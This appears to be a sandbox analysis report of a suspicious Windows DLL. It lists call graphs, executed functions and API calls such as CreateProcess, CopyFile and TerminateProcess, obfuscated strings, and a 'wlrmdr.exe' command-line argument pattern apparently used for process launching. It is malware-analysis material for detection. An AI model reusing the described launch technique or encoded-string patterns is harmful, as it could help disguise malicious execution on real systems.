14622->14624 14631 6f9eb123 __DllMainCRTStartup@12 14623->14631 14632 6f9eafcd EnterCriticalSection 14623->14632 14625 6f9ec1f9 __fread_nolock 33 API calls 14624->14625 14625->14631 14627 6f9eb149 14633 6f9eb189 14627->14633 14629 6f9eb156 14647 6f9eb181 14629->14647 14631->14454 14632->14627 14634 6f9eb1b9 14633->14634 14635 6f9eb196 14633->14635 14637 6f9f00d8 ___scrt_uninitialize_crt 75 API calls 14634->14637 14646 6f9eb1b1 __DllMainCRTStartup@12 14634->14646 14636 6f9ec1f9 __fread_nolock 33 API calls 14635->14636 14636->14646 14638 6f9eb1d1 14637->14638 14650 6f9f01af 14638->14650 14641 6f9ed222 __fread_nolock 50 API calls 14642 6f9eb1e5 14641->14642 14654 6f9f07f3 14642->14654 14645 6f9ee7c4 ___free_lconv_mon 17 API calls 14645->14646 14646->14629 14669 6f9eafe1 LeaveCriticalSection 14647->14669 14649 6f9eb187 14649->14631 14651 6f9eb1d9 14650->14651 14652 6f9f01c6 14650->14652 14651->14641 14652->14651 14653 6f9ee7c4 ___free_lconv_mon 17 API calls 14652->14653 14653->14651 14655 6f9f081c 14654->14655 14660 6f9eb1ec 14654->14660 14656 6f9f086b 14655->14656 14658 6f9f0843 14655->14658 14657 6f9ec1f9 __fread_nolock 33 API calls 14656->14657 14657->14660 14661 6f9f0762 14658->14661 14660->14645 14660->14646 14662 6f9f076e __FrameHandler3::FrameUnwindToState 14661->14662 14663 6f9f33e2 __wsopen_s EnterCriticalSection 14662->14663 14664 6f9f077c 14663->14664 14665 6f9f08c6 __wsopen_s 53 API calls 14664->14665 14666 6f9f07ad 14664->14666 14665->14666 14667 6f9f07e7 __DllMainCRTStartup@12 LeaveCriticalSection 14666->14667 14668 6f9f07d0 14667->14668 14668->14660 14669->14649 14672 6f9ebf3f __FrameHandler3::FrameUnwindToState 14670->14672 14671 6f9ebf2e 14671->14225 14672->14671 14673 6f9ebf89 14672->14673 14674 6f9ebf52 __fread_nolock 14672->14674 14683 6f9eafcd EnterCriticalSection 14673->14683 14676 6f9ee7b1 __dosmaperr 17 API calls 14674->14676 14678 6f9ebf6c 14676->14678 14677 6f9ebf93 14684 6f9ebd3d 14677->14684 14680 6f9ec276 __fread_nolock 50 API calls 14678->14680 14680->14671 14683->14677 14687 6f9ebd4f __fread_nolock 14684->14687 14690 6f9ebd6c 14684->14690 14685 6f9ebd5c 14686 6f9ee7b1 __dosmaperr 17 API calls 14685->14686 14695 6f9ebd61 14686->14695 14687->14685 14689 6f9ebdad __fread_nolock 14687->14689 14687->14690 14688 6f9ec276 __fread_nolock 50 API calls 14688->14690 14689->14690 14692 6f9ebed8 __fread_nolock 14689->14692 14693 6f9ed222 __fread_nolock 50 API calls 14689->14693 14700 6f9ebfd0 14689->14700 14714 6f9ee197 14689->14714 14697 6f9ebfc8 14690->14697 14694 6f9ee7b1 __dosmaperr 17 API calls 14692->14694 14693->14689 14694->14695 14695->14688 14812 6f9eafe1 LeaveCriticalSection 14697->14812 14699 6f9ebfce 14699->14671 14701 6f9ebfe1 14700->14701 14705 6f9ebfdd __fread_nolock 14700->14705 14702 6f9ebfe8 14701->14702 14707 6f9ebffb __fread_nolock 14701->14707 14703 6f9ee7b1 __dosmaperr 17 API calls 14702->14703 14704 6f9ebfed 14703->14704 14706 6f9ec276 __fread_nolock 50 API calls 14704->14706 14705->14689 14706->14705 14707->14705 14708 6f9ec029 14707->14708 14709 6f9ec032 14707->14709 14710 6f9ee7b1 __dosmaperr 17 API calls 14708->14710 14709->14705 14712 6f9ee7b1 __dosmaperr 17 API calls 14709->14712 14715 6f9ee1a9 14714->14715 14717 6f9ee1c1 14714->14717 14716 6f9ee79e __dosmaperr 17 API calls 14715->14716 14719 6f9ee1ae 14716->14719 14718 6f9ee503 14717->14718 14723 6f9ee204 14717->14723 14720 6f9ee79e __dosmaperr 17 API calls 14718->14720 14721 6f9ee7b1 __dosmaperr 17 API calls 14719->14721 14722 6f9ee508 14720->14722 14726 6f9ee1b6 14721->14726 14724 6f9ee7b1 __dosmaperr 17 API calls 14722->14724 14725 6f9ee20f 14723->14725 14723->14726 14731 6f9ee23f 14723->14731 14728 6f9ee79e __dosmaperr 17 API calls 14725->14728 14726->14689 14729 6f9ee214 14728->14729 14733 6f9ee258 14731->14733 14734 6f9ee265 14731->14734 14735 6f9ee293 14731->14735 14733->14734 14739 6f9ee281 14733->14739 14736 6f9ee79e __dosmaperr 17 API calls 14734->14736 14777 6f9ee7fe 14735->14777 14812->14699 14829 6f9ea6cb 14813->14829 14815 6f9eab99 14816 6f9eabbe 14815->14816 14820 6f9ea670 __DllMainCRTStartup@12 50 API calls 14815->14820 14836 6f9eae06 14816->14836 14817 6f9eab66 14819 6f9ec1f9 __fread_nolock 33 API calls 14817->14819 14818 6f9eab51 14818->14815 14818->14817 14828 6f9eab81 __DllMainCRTStartup@12 14818->14828 14819->14828 14820->14816 14828->14463 14830 6f9ea6e3 14829->14830 14831 6f9ea6d0 14829->14831 14830->14818 14832 6f9ee7b1 __dosmaperr 17 API calls 14831->14832 14833 6f9ea6d5 14832->14833 14834 6f9ec276 __fread_nolock 50 API calls 14833->14834 14835 6f9ea6e0 14834->14835 14835->14818 14837 6f9eae12 14836->14837 14952->13817 15415 6f9f72ac 15418 6f9f2892 15415->15418 15419 6f9f289b 15418->15419 15420 6f9f28cd 15418->15420 15424 6f9ed8d2 15419->15424 15425 6f9ed8dd 15424->15425 15426 6f9ed8e3 15424->15426 15428 6f9efcb0 __dosmaperr 7 API calls 15425->15428 15427 6f9efcef __dosmaperr 7 API calls 15426->15427 15446 6f9ed8e9 15426->15446 15429 6f9ed8fd 15427->15429 15428->15426 15430 6f9ef9d8 __dosmaperr 17 API calls 15429->15430 15429->15446 15432 6f9ed90d 15430->15432 15431 6f9ed0c1 CallUnexpected 50 API calls 15433 6f9ed967 15431->15433 15434 6f9ed92a 15432->15434 15435 6f9ed915 15432->15435 15436 6f9efcef __dosmaperr 7 API calls 15434->15436 15437 6f9efcef __dosmaperr 7 API calls 15435->15437 15438 6f9ed936 15436->15438 15444 6f9ed921 15437->15444 15439 6f9ed93a 15438->15439 15440 6f9ed949 15438->15440 15441 6f9efcef __dosmaperr 7 API calls 15439->15441 15442 6f9ed619 __dosmaperr 17 API calls 15440->15442 15441->15444 15445 6f9ed954 15442->15445 15443 6f9ee7c4 ___free_lconv_mon 17 API calls 15443->15446 15444->15443 15447 6f9ee7c4 ___free_lconv_mon 17 API calls 15445->15447 15446->15431 15448 6f9ed8ee 15446->15448 15447->15448 15449 6f9f269d 15448->15449 15472 6f9f27f2 15449->15472 15454 6f9f26e0 15454->15420 15455 6f9ee7fe __fread_nolock 18 API calls 15456 6f9f26f1 15455->15456 15457 6f9f26f9 15456->15457 15458 6f9f2707 15456->15458 15459 6f9ee7c4 ___free_lconv_mon 17 API calls 15457->15459 15490 6f9f28ed 15458->15490 15459->15454 15462 6f9f273f 15463 6f9ee7b1 __dosmaperr 17 API calls 15462->15463 15464 6f9f2744 15463->15464 15466 6f9ee7c4 ___free_lconv_mon 17 API calls 15464->15466 15465 6f9f2786 15468 6f9f27cf 15465->15468 15501 6f9f2316 15465->15501 15466->15454 15467 6f9f275a 15467->15465 15471 6f9ee7c4 ___free_lconv_mon 17 API calls 15467->15471 15470 6f9ee7c4 ___free_lconv_mon 17 API calls 15468->15470 15470->15454 15471->15465 15473 6f9f27fe __FrameHandler3::FrameUnwindToState 15472->15473 15480 6f9f2818 15473->15480 15509 6f9f189f EnterCriticalSection 15473->15509 15475 6f9f2854 15510 6f9f2871 15475->15510 15476 6f9f2828 15476->15475 15482 6f9ee7c4 ___free_lconv_mon 17 API calls 15476->15482 15478 6f9ed0c1 CallUnexpected 50 API calls 15481 6f9f2891 15478->15481 15479 6f9f26c7 15483 6f9f2424 15479->15483 15480->15478 15480->15479 15482->15475 15484 6f9ef88b __DllMainCRTStartup@12 50 API calls 15483->15484 15485 6f9f2436 15484->15485 15486 6f9f2457 15485->15486 15487 6f9f2445 GetOEMCP 15485->15487 15488 6f9f245c GetACP 15486->15488 15489 6f9f246e 15486->15489 15487->15489 15488->15489 15489->15454 15489->15455 15491 6f9f2424 52 API calls 15490->15491 15492 6f9f290d 15491->15492 15493 6f9f2a12 15492->15493 15494 6f9f294a IsValidCodePage 15492->15494 15499 6f9f2965 __fread_nolock 15492->15499 15495 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15493->15495 15494->15493 15496 6f9f295c 15494->15496 15497 6f9f2734 15495->15497 15498 6f9f2985 GetCPInfo 15496->15498 15496->15499 15497->15462 15497->15467 15498->15493 15498->15499 15514 6f9f24f8 15499->15514 15502 6f9f2322 __FrameHandler3::FrameUnwindToState 15501->15502 15589 6f9f189f EnterCriticalSection 15502->15589 15504 6f9f232c 15590 6f9f2363 15504->15590 15509->15476 15513 6f9f18e7 LeaveCriticalSection 15510->15513 15512 6f9f2878 15512->15480 15513->15512 15515 6f9f2520 GetCPInfo 15514->15515 15516 6f9f25e9 15514->15516 15515->15516 15521 6f9f2538 15515->15521 15518 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15516->15518 15517 6f9f3cd2 __DllMainCRTStartup@12 53 API calls 15519 6f9f25a0 15517->15519 15520 6f9f269b 15518->15520 15525 6f9f7263 15519->15525 15520->15493 15521->15517 15524 6f9f7263 56 API calls 15524->15516 15526 6f9ef88b __DllMainCRTStartup@12 50 API calls 15525->15526 15527 6f9f7276 15526->15527 15530 6f9f7074 15527->15530 15531 6f9f708f 15530->15531 15558 6f9f2c0b 15531->15558 15533 6f9f724e 15534 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15533->15534 15535 6f9f25c1 15534->15535 15535->15524 15536 6f9f70d3 15536->15533 15537 6f9ee7fe __fread_nolock 18 API calls 15536->15537 15539 6f9f70f9 __alloca_probe_16 15536->15539 15550 6f9f71a1 15536->15550 15537->15539 15538 6f9f3dd3 __freea 17 API calls 15538->15533 15540 6f9f2c0b __fread_nolock MultiByteToWideChar 15539->15540 15539->15550 15541 6f9f7142 15540->15541 15541->15550 15561 6f9efd7c 15541->15561 15544 6f9f7178 15549 6f9efd7c 8 API calls 15544->15549 15544->15550 15545 6f9f71b0 15546 6f9f7239 15545->15546 15547 6f9ee7fe __fread_nolock 18 API calls 15545->15547 15551 6f9f71c2 __alloca_probe_16 15545->15551 15548 6f9f3dd3 __freea 17 API calls 15546->15548 15547->15551 15548->15550 15549->15550 15550->15538 15551->15546 15552 6f9efd7c 8 API calls 15551->15552 15553 6f9f7205 15552->15553 15553->15546 15569 6f9f2cc5 15553->15569 15555 6f9f721f 15555->15546 15556 6f9f7228 15555->15556 15572 6f9f3dd3 15556->15572 15576 6f9f2b73 15558->15576 15578 6f9efa4f 15561->15578 15564 6f9efd8d mydllmain 15567 6f9efdb2 15564->15567 15565 6f9efdb4 15581 6f9efdd9 15565->15581 15567->15544 15567->15545 15567->15550 15568 6f9efdcd LCMapStringW 15568->15567 15570 6f9f2cd8 __wsopen_s 15569->15570 15571 6f9f2d16 WideCharToMultiByte 15570->15571 15571->15555 15573 6f9f3ddf 15572->15573 15574 6f9f3df0 15572->15574 15573->15574 15575 6f9ee7c4 ___free_lconv_mon 17 API calls 15573->15575 15574->15550 15575->15574 15577 6f9f2b84 MultiByteToWideChar 15576->15577 15577->15536 15579 6f9efb4e __dosmaperr 5 API calls 15578->15579 15580 6f9efa65 15579->15580 15580->15564 15580->15565 15586 6f9efa69 15581->15586 15584 6f9efdea mydllmain 15585 6f9efdfa 15584->15585 15585->15568 15587 6f9efb4e __dosmaperr 5 API calls 15586->15587 15588 6f9efa7f 15587->15588 15588->15584 15588->15585 15589->15504 15591 6f9ebfd0 __fread_nolock 50 API calls 15590->15591 15592 6f9f2385 15591->15592 15593 6f9ebfd0 __fread_nolock 50 API calls 15592->15593 15594 6f9f23a4 15593->15594 15595 6f9f2339 15594->15595 15596 6f9ee7c4 ___free_lconv_mon 17 API calls 15594->15596 15597 6f9f2357 15595->15597 15596->15595 15600 6f9f18e7 LeaveCriticalSection 15597->15600 15599 6f9f2345 15599->15468 15600->15599 16515 6f9edb7b 16518 6f9edb02 16515->16518 16519 6f9edb0e __FrameHandler3::FrameUnwindToState 16518->16519 16526 6f9f189f EnterCriticalSection 16519->16526 16521 6f9edb46 16531 6f9edb64 16521->16531 16522 6f9edb18 16522->16521 16527 6f9f3a12 16522->16527 16526->16522 16528 6f9f3a20 __dosmaperr 16527->16528 16530 6f9f3a2d 16527->16530 16529 6f9f3745 __dosmaperr 17 API calls 16528->16529 16528->16530 16529->16530 16530->16522 16534 6f9f18e7 LeaveCriticalSection 16531->16534 16533 6f9edb52 16534->16533 14953 6f9e31f9 14954 6f9e3207 14953->14954 14955 6f9e3202 14953->14955 14959 6f9e30c3 14954->14959 14974 6f9e33dd 14955->14974 14960 6f9e30cf __FrameHandler3::FrameUnwindToState 14959->14960 14961 6f9e30f8 dllmain_raw 14960->14961 14962 6f9e30de 14960->14962 14963 6f9e30f3 14960->14963 14961->14962 14964 6f9e3112 dllmain_crt_dispatch 14961->14964 14965 6f9e1000 __DllMainCRTStartup@12 148 API calls 14963->14965 14964->14962 14964->14963 14966 6f9e3133 14965->14966 14967 6f9e3164 14966->14967 14970 6f9e1000 __DllMainCRTStartup@12 148 API calls 14966->14970 14967->14962 14968 6f9e316d dllmain_crt_dispatch 14967->14968 14968->14962 14969 6f9e3180 dllmain_raw 14968->14969 14969->14962 14971 6f9e314b 14970->14971 14972 6f9e3013 __DllMainCRTStartup@12 172 API calls 14971->14972 14973 6f9e3159 dllmain_raw 14972->14973 14973->14967 14975 6f9e33f3 14974->14975 14977 6f9e33fc 14975->14977 14978 6f9e3390 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 14975->14978 14977->14954 14978->14977

              Executed Functions

              Function 6F9E1629 Relevance: 37.0, APIs: 12, Strings: 9, Instructions: 291filesleepCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,00000000,456EBF13,%s%s,00000000,00000000), ref: 6F9E16D8
              • _strlen.LIBCMT ref: 6F9E17B1
              • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6F9E1809
                • Part of subcall function 6F9E1CFA: CoInitialize.OLE32(00000000), ref: 6F9E1D40
                • Part of subcall function 6F9E1CFA: CoCreateInstance.OLE32(6F9FB200,00000000,00000001,6F9FB1F0,?), ref: 6F9E1D59
                • Part of subcall function 6F9E1CFA: CoUninitialize.OLE32 ref: 6F9E1D70
              • CopyFileW.KERNEL32(?,?,00000000), ref: 6F9E191C
              • Sleep.KERNEL32(000003E8), ref: 6F9E1927
                • Part of subcall function 6F9EB8FB: MoveFileExW.KERNEL32(?,6F9E1940,00000002,?,6F9E1940,?,?), ref: 6F9EB908
                • Part of subcall function 6F9EB8FB: GetLastError.KERNEL32 ref: 6F9EB912
                • Part of subcall function 6F9EB8FB: __dosmaperr.LIBCMT ref: 6F9EB919
              • TerminateProcess.KERNEL32(00000000), ref: 6F9E1953
              • CloseHandle.KERNEL32 ref: 6F9E195F
              • CloseHandle.KERNEL32 ref: 6F9E1967
              • TerminateProcess.KERNEL32(00000000), ref: 6F9E19C4
              • CloseHandle.KERNEL32 ref: 6F9E19D0
              • CloseHandle.KERNEL32 ref: 6F9E19D8
              • FindNextFileW.KERNELBASE(00000000,?), ref: 6F9E19ED
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: CloseFileHandle$FindProcessTerminate$CopyCreateEnvironmentErrorExpandFirstInitializeInstanceLastMoveNextSleepStringsUninitialize__dosmaperr_strlen
              • String ID: %s%s$%s\%s$%s\*.*$%sk$-s 3600 -f 0 -t _ -m _ -a 11 -u $IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7B$PT30S$WlrMakeService$wlrmdr.exe
              • API String ID: 3479604460-3724355521
              • Opcode ID: 865d66bfa23dd2daa7db51eadbdcba607887d4989aaba24b489d03dfd68a548e
              • Instruction ID: 2b3570ad5de0d49ab488c1ca6e9674aea4e97dff0f1587f219a45bb17a011366
              • Opcode Fuzzy Hash: 865d66bfa23dd2daa7db51eadbdcba607887d4989aaba24b489d03dfd68a548e
              • Instruction Fuzzy Hash: A7B19271904349AADF21DFA4DC49BEE37B8BF19318F00822AE908961C1EB759A85CB51
              Function 6F9E2959 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156sleepCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6F9E29A3
              • GetEnvironmentVariableW.KERNEL32(?,?,00000032,?,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6F9E29F6
                • Part of subcall function 6F9E1274: GetModuleHandleW.KERNEL32(kernel32.dll,000000C8,00000000,6FA00E3C), ref: 6F9E12AB
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E12CA
                • Part of subcall function 6F9E1274: GetProcAddress.KERNEL32(?), ref: 6F9E1318
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E1336
                • Part of subcall function 6F9E1274: GetProcAddress.KERNEL32(?), ref: 6F9E137E
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E13A1
              • _strlen.LIBCMT ref: 6F9E2A1C
                • Part of subcall function 6F9E140F: _strlen.LIBCMT ref: 6F9E148D
                • Part of subcall function 6F9E140F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04464), ref: 6F9E151B
              • Sleep.KERNELBASE(000005DC), ref: 6F9E2A74
              • Sleep.KERNELBASE(00007530), ref: 6F9E2A7B
              • _strlen.LIBCMT ref: 6F9E2A9A
              • _strlen.LIBCMT ref: 6F9E2AFD
                • Part of subcall function 6F9E1629: FindFirstFileW.KERNELBASE(?,00000000,456EBF13,%s%s,00000000,00000000), ref: 6F9E16D8
                • Part of subcall function 6F9E1629: FindNextFileW.KERNELBASE(00000000,?), ref: 6F9E19ED
              Strings
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6F9E2A01
              • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6F9E2A7D
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6F9E2AE2
              • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6F9E2983
              • %s%s, xrefs: 6F9E2AC1, 6F9E2AC7, 6F9E2B2A
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: _strlen$AddressFileFindProcSleep$CreateEnvironmentFirstHandleModuleNextProcessVariable
              • String ID: %s%s$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
              • API String ID: 2056693606-1305241286
              • Opcode ID: df55d3a155478a89b3f0b06dd6e76a05333401030271a5f2c61872b7ee2740d8
              • Instruction ID: 17d94b2857fc7741f245efeb471b1fcccb32c793a4b521c6de76663591f44adb
              • Opcode Fuzzy Hash: df55d3a155478a89b3f0b06dd6e76a05333401030271a5f2c61872b7ee2740d8
              • Instruction Fuzzy Hash: B351FEB1904345ABD725DB60E880DEB77ECFF9924CF40492DA549932C1EB35EA05CB62
              Function 6F9E140F Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159processsleepCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6F9E148D
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04464), ref: 6F9E151B
              • _strlen.LIBCMT ref: 6F9E1573
              • Sleep.KERNELBASE(000003E8), ref: 6F9E15EB
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04480), ref: 6F9E160C
              Strings
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6F9E1558
              • %s %s, xrefs: 6F9E14E4, 6F9E15CC
              • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6F9E146E
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: CreateProcess_strlen$Sleep
              • String ID: %s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
              • API String ID: 688041527-2059495477
              • Opcode ID: f392528dd9747850c67de7894e4d38d4821dd312b5f699fb2f2911e59873dbb5
              • Instruction ID: 0a2ed944832ab80346731a79398aa8db3c606314b1904ac9d2d30e768f9b2d10
              • Opcode Fuzzy Hash: f392528dd9747850c67de7894e4d38d4821dd312b5f699fb2f2911e59873dbb5
              • Instruction Fuzzy Hash: CC5161B2504344BEE321DB64DC85FABB7ECEF99248F40482DB648D31C1EB74E9448B66
              Function 6F9E3013 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6F9E305A
              • ___scrt_uninitialize_crt.LIBCMT ref: 6F9E3074
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: Initialize___scrt_uninitialize_crt
              • String ID:
              • API String ID: 2442719207-0
              • Opcode ID: 08a5ccfb64dd6d1db816cfbae6590f655f48eb6b415d1fce6836fc06bceb3bac
              • Instruction ID: 2838cea00fcf763d6ca778bbbb107e5b8b1a72ecfc90231cdc09bd71a6973925
              • Opcode Fuzzy Hash: 08a5ccfb64dd6d1db816cfbae6590f655f48eb6b415d1fce6836fc06bceb3bac
              • Instruction Fuzzy Hash: 4141B172D04714EEDB228FB5D842FAE7E79EF817A9F00411AE814562E1D731D9068FA0
              Function 6F9E30C3 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 219 6f9e30c3-6f9e30d4 call 6f9e38c0 222 6f9e30d6-6f9e30dc 219->222 223 6f9e30e5-6f9e30ec 219->223 222->223 224 6f9e30de-6f9e30e0 222->224 225 6f9e30ee-6f9e30f1 223->225 226 6f9e30f8-6f9e310c dllmain_raw 223->226 227 6f9e31be-6f9e31cd 224->227 225->226 228 6f9e30f3-6f9e30f6 225->228 229 6f9e31b5-6f9e31bc 226->229 230 6f9e3112-6f9e3123 dllmain_crt_dispatch 226->230 231 6f9e3129-6f9e313b call 6f9e1000 228->231 229->227 230->229 230->231 234 6f9e313d-6f9e313f 231->234 235 6f9e3164-6f9e3166 231->235 234->235 238 6f9e3141-6f9e315f call 6f9e1000 call 6f9e3013 dllmain_raw 234->238 236 6f9e316d-6f9e317e dllmain_crt_dispatch 235->236 237 6f9e3168-6f9e316b 235->237 236->229 239 6f9e3180-6f9e31b2 dllmain_raw 236->239 237->229 237->236 238->235 239->229
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: a76b709614151968b494c9b7d4a54c37225d2d521a341383d6d2daae4fe11e71
              • Instruction ID: 3cfb22a009475ad28d025200fece35524928e05d4f0d5e0287fb5159dbdaf047
              • Opcode Fuzzy Hash: a76b709614151968b494c9b7d4a54c37225d2d521a341383d6d2daae4fe11e71
              • Instruction Fuzzy Hash: 17217C72E04715EECB338F75C842EAF3E79AF81B95B00411AF8145A2E1D731DD418BA0
              Function 6F9E2F0C Relevance: 4.6, APIs: 3, Instructions: 76COMMON
              Download Yara Rule

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6F9E2F59
                • Part of subcall function 6F9E385E: mydllmain.DLL1(00000001,00000000,00000001,6F9E2F5E,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001), ref: 6F9E3877
                • Part of subcall function 6F9E3428: InitializeSListHead.KERNEL32(6FA03D60,6F9E2F63,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8), ref: 6F9E342D
